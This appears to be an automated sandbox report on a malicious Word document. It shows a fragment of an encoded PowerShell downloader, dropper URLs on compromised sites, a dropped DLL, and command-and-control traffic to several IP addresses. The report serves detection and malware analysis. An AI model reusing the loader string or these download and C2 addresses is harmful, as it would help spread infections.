8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAKwAnAG0AJwApACsAJwBwACcAKwAoACcAdQB0ACcAKwAnAGUAJwApA

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Multi AV Scanner detection for domain / URLShow sources
              Source: rycomputer.comVirustotal: Detection: 11%Perma Link
              Source: 00zyku.comVirustotal: Detection: 7%Perma Link
              Source: wheelcomoving.comVirustotal: Detection: 7%Perma Link
              Source: d-cem.comVirustotal: Detection: 10%Perma Link
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dllMetadefender: Detection: 63%Perma Link
              Source: C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dllReversingLabs: Detection: 60%
              Multi AV Scanner detection for submitted fileShow sources
              Source: Informacion_29.docVirustotal: Detection: 62%Perma Link
              Source: Informacion_29.docReversingLabs: Detection: 79%
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_034375AE CryptDecodeObjectEx,14_2_034375AE
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
              Source: unknownHTTPS traffic detected: 58.97.195.135:443 -> 192.168.2.3:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.214.169.246:443 -> 192.168.2.3:49723 version: TLS 1.2
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000004.00000002.290931845.0000018A2C3AD000.00000004.00000001.sdmp
              Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.290506606.0000018A2C08B000.00000004.00000001.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb* source: powershell.exe, 00000004.00000002.290573053.0000018A2C122000.00000004.00000001.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbJ source: powershell.exe, 00000004.00000002.290573053.0000018A2C122000.00000004.00000001.sdmp
              Source: Binary string: B:\cliprgn_src\Release\ClipRgn.pdb source: rundll32.exe, 0000000D.00000002.285896384.0000000010042000.00000002.00020000.sdmp, Q27V.dll.4.dr
              Source: Binary string: System.pdb source: powershell.exe, 00000004.00000002.290506606.0000018A2C08B000.00000004.00000001.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.290651149.0000018A2C320000.00000004.00000001.sdmp
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_100272AB FindFirstFileExW,FindNextFileW,FindClose,13_2_100272AB
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10026EEF FindFirstFileExW,13_2_10026EEF
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0343109C FindFirstFileW,14_2_0343109C
              Source: global trafficDNS query: name: wheelcomoving.com
              Source: global trafficTCP traffic: 192.168.2.3:49722 -> 58.97.195.135:443
              Source: global trafficTCP traffic: 192.168.2.3:49711 -> 66.85.46.76:80

              Networking:

              barindex
              Potential dropper URLs found in powershell memoryShow sources
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/" rel="bookmark" title="Keto Reset Instant Pot Cookbook Trailer"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Keto Reset Instant Pot Cookbook Trailer"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="vide8x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="The Ke
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/" rel="bookmark" title="Keto Reset Instant Pot Cookbook Trailer"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Keto Reset Instant Pot Cookbook Trailer"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="vide8x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="The Ke0
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/what-to-avoid-on-a-ketogenic-diet-what-is-ketogenic-diet/" rel="bookmark" title="WHAT TO AVOID ON A KETOGENIC DIET | What is Ketogenic Diet?"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="WHAT TO AVOID ON A KETOGENIC DIET | What is Ketogenic Diet?"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/pepito-manaloto-keto-diet-sagot-sa-katabaan-ni-mara/" rel="bookmark" title="Pepito Manaloto: Keto diet, sagot sa katabaan ni Mara?"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="Pepito Manaloto: Keto diet, sagot sa katabaan ni Mara?"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/what-i-eat-to-lose-weight-2020-easy-keto-recipes-keto-full-day-eating-daniela-diaries/" rel="bookmark" title="WHAT I EAT TO LOSE WEIGHT 2020 / EASY KETO RECIPES / KETO FULL DAY EATING / DANIELA DIARIES"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="WHAT I EAT TO LOSE WEIGHT 2020 / EASY KETO RECIPES / KETO FULL DAY EATING / DANIELA DIARIES"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/beyond-keto-virtual-summit-the-mid-life-re-life-blueprint-programme-free-all-access-pass/" rel="bookmark" title="Beyond Keto Virtual Summit &#8211; The Mid-Life Re-Life Blueprint Programme &#8211; Free All Access Pass"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="Beyond Keto Virtual Summit &#8211; The Mid-Life Re-Life Blueprint Programme &#8211; Free All Access Pass"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/the-ketonian-cookbook-quick-and-easy-low-carb/" rel="bookmark" title="The Ketonian Cookbook &#8211; QUICK AND EASY LOW CARB"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="The Ketonian Cookbook &#8211; QUICK AND EASY LOW CARB"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="video"/></span></a></div>
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/" rel="bookmark" title="Keto Reset Instant Pot Cookbook Trailer"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Keto Reset Instant Pot Cookbook Trailer"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="vide
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/" rel="bookmark" title="Keto Reset Instant Pot Cookbook Trailer"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Keto Reset Instant Pot Cookbook Trailer"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="vide0
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in memory: type-post_type menu-item-object-page menu-item-1158"><a title="" href="https://wheelcomoving.com/company/">About us</a></li><li id="menu-item-1138" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1138"><a title="" href="https://wheelcomoving.com/company/contact/">Contact</a></li><li id="menu-item-1406" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1406"><a title="" href="https://wheelcomoving.com/services/">Our Services</a><ul class="sub-menu"><li id="menu-item-1143" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1143"><a title="" href="https://wheelcomoving.com/services/trucking/">Trucking</a></li><li id="menu-item-1141" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1141"><a title="" href="https://wheelcomoving.com/services/air-cargo/">Air Cargo</a></li><li id="menu-item-1140" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1140"><a title="" href="https://wheelcomoving.com/services/ocean-cargo/">Ocean Cargo</a></li><li id="menu-item-1142" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1142"><a title="" href="https://wheelcomoving.com/services/courier/">Courier</a></li></ul></li>
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="&#xf09a;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="&#xf099;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="&#xf0d5;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="&#xf231;" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="&#xf002;" class="btIcoHolder"></a></div>
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in memory: <li id="menu-item-1598" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-1598"><a title="" href="https://wheelcomoving.com/">Home</a></li><li id="menu-item-2113" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2113"><a href="https://wheelcomoving.com/track-and-trace/">TRACK AND TRACE</a></li><li id="menu-item-1158" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1158"><a title="" href="https://wheelcomoving.com/company/">About us</a></li><li id="menu-item-1138" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1138"><a title="" href="https://wheelcomoving.com/company/contact/">Contact</a></li><li id="menu-item-1406" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1406"><a title="" href="https://wheelcomoving.com/services/">Our Services</a><ul class="sub-menu"><li id="menu-item-1143" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1143"><a title="" href="https://wheelcomoving.com/services/trucking/">Trucking</a></li><li id="menu-item-1141" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1141"><a title="" href="https://wheelcomoving.com/services/air-cargo/">Air Cargo</a></li><li id="menu-item-1140" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1140"><a title="" href="https://wheelcomoving.com/services/ocean-cargo/">Ocean Cargo</a></li><li id="menu-item-1142" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1142"><a title="" href="https://wheelcomoving.com/services/courier/">Courier</a></li></ul></li>
              Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmpString found in memory: http://wheelcomoving.com/p/RuMeRPa/
              Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmpString found in memory: http://00zyku.com/wp-admin/eYu1Q/
              Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmpString found in memory: http://ketoresetme.com/wp-content/pmJ/
              Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmpString found in memory: https://rycomputer.com/content/TL/
              Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmpString found in memory: https://d-cem.com/wp-admin/JSLwG1/
              Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmpString found in memory: http://thebestfikrah.com/wp-admin/fOIlVX/
              Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmpString found in memory: https://phawayagency.com/wp-admin/mXo4b/
              Source: global trafficTCP traffic: 192.168.2.3:49755 -> 138.197.99.250:8080
              Source: global trafficHTTP traffic detected: GET /p/RuMeRPa/ HTTP/1.1Host: wheelcomoving.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /wp-content/pmJ/ HTTP/1.1Host: ketoresetme.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 66.85.46.76 66.85.46.76
              Source: Joe Sandbox ViewIP Address: 152.170.79.100 152.170.79.100
              Source: Joe Sandbox ViewASN Name: HOST4GEEKS-LLCUS HOST4GEEKS-LLCUS
              Source: Joe Sandbox ViewASN Name: TelecomArgentinaSAAR TelecomArgentinaSAAR
              Source: Joe Sandbox ViewASN Name: TRUEINTERNET-AS-APTRUEINTERNETCoLtdTH TRUEINTERNET-AS-APTRUEINTERNETCoLtdTH
              Source: Joe Sandbox ViewASN Name: TelecomArgentinaSAAR TelecomArgentinaSAAR
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: global trafficHTTP traffic detected: POST /pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/ HTTP/1.1DNT: 0Referer: 138.197.99.250/pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/Content-Type: multipart/form-data; boundary=---------------------jHDY9OeuzPzg6fZb1CxtnUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 138.197.99.250:8080Content-Length: 6500Connection: Keep-AliveCache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 152.170.79.100
              Source: unknownTCP traffic detected without corresponding DNS query: 152.170.79.100
              Source: unknownTCP traffic detected without corresponding DNS query: 152.170.79.100
              Source: unknownTCP traffic detected without corresponding DNS query: 190.247.139.101
              Source: unknownTCP traffic detected without corresponding DNS query: 190.247.139.101
              Source: unknownTCP traffic detected without corresponding DNS query: 190.247.139.101
              Source: unknownTCP traffic detected without corresponding DNS query: 138.197.99.250
              Source: unknownTCP traffic detected without corresponding DNS query: 138.197.99.250
              Source: unknownTCP traffic detected without corresponding DNS query: 138.197.99.250
              Source: unknownTCP traffic detected without corresponding DNS query: 138.197.99.250
              Source: unknownTCP traffic detected without corresponding DNS query: 138.197.99.250
              Source: unknownTCP traffic detected without corresponding DNS query: 138.197.99.250
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0344023A InternetReadFile,14_2_0344023A
              Source: global trafficHTTP traffic detected: GET /p/RuMeRPa/ HTTP/1.1Host: wheelcomoving.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /wp-content/pmJ/ HTTP/1.1Host: ketoresetme.comConnection: Keep-Alive
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="&#xf09a;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="&#xf099;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="&#xf0d5;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="&#xf231;" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="&#xf002;" class="btIcoHolder"></a></div> equals www.facebook.com (Facebook)
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="&#xf09a;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="&#xf099;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="&#xf0d5;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="&#xf231;" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="&#xf002;" class="btIcoHolder"></a></div> equals www.twitter.com (Twitter)
              Source: unknownDNS traffic detected: queries for: wheelcomoving.com
              Source: unknownHTTP traffic detected: POST /pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/ HTTP/1.1DNT: 0Referer: 138.197.99.250/pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/Content-Type: multipart/form-data; boundary=---------------------jHDY9OeuzPzg6fZb1CxtnUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 138.197.99.250:8080Content-Length: 6500Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Jan 2021 10:52:58 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://wheelcomoving.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, Keep-AliveVary: Accept-EncodingKeep-Alive: timeout=5, max=100Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 0d 0a 09 0d 0a Data Ascii: 32<!DOCTYPE html><html lang="en-US"><head>
              Source: powershell.exe, 00000004.00000002.289183876.0000018A152D0000.00000004.00000001.sdmpString found in binary or memory: http://00zyku.com
              Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmpString found in binary or memory: http://00zyku.com/wp-admin/eYu1Q/
              Source: powershell.exe, 00000004.00000002.289171312.0000018A152BB000.00000004.00000001.sdmpString found in binary or memory: http://00zyku.comx
              Source: rundll32.exe, 0000000E.00000002.470615801.000000000326D000.00000004.00000020.sdmpString found in binary or memory: http://138.197.99.250:8080/pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5
              Source: rundll32.exe, 0000000E.00000002.470615801.000000000326D000.00000004.00000020.sdmpString found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/
              Source: rundll32.exe, 0000000E.00000003.411786554.0000000003271000.00000004.00000001.sdmpString found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/(
              Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmpString found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/7
              Source: rundll32.exe, 0000000E.00000002.470615801.000000000326D000.00000004.00000020.sdmpString found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/T
              Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmpString found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/V
              Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmpString found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/e
              Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmpString found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/gss
              Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmpString found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/s
              Source: rundll32.exe, 0000000E.00000002.470615801.000000000326D000.00000004.00000020.sdmp, rundll32.exe, 0000000E.00000003.411786554.0000000003271000.00000004.00000001.sdmpString found in binary or memory: http://190.247.139.101/o7vtz/g3p9nxague/
              Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmpString found in binary or memory: http://190.247.139.101/o7vtz/g3p9nxague/?
              Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmpString found in binary or memory: http://190.247.139.101/o7vtz/g3p9nxague/llc
              Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmpString found in binary or memory: http://190.247.139.101/o7vtz/g3p9nxague/w
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: http://192.168.0.194/wp_011_lifestyle/wp-content/uploads/2017/03/2.jpg
              Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
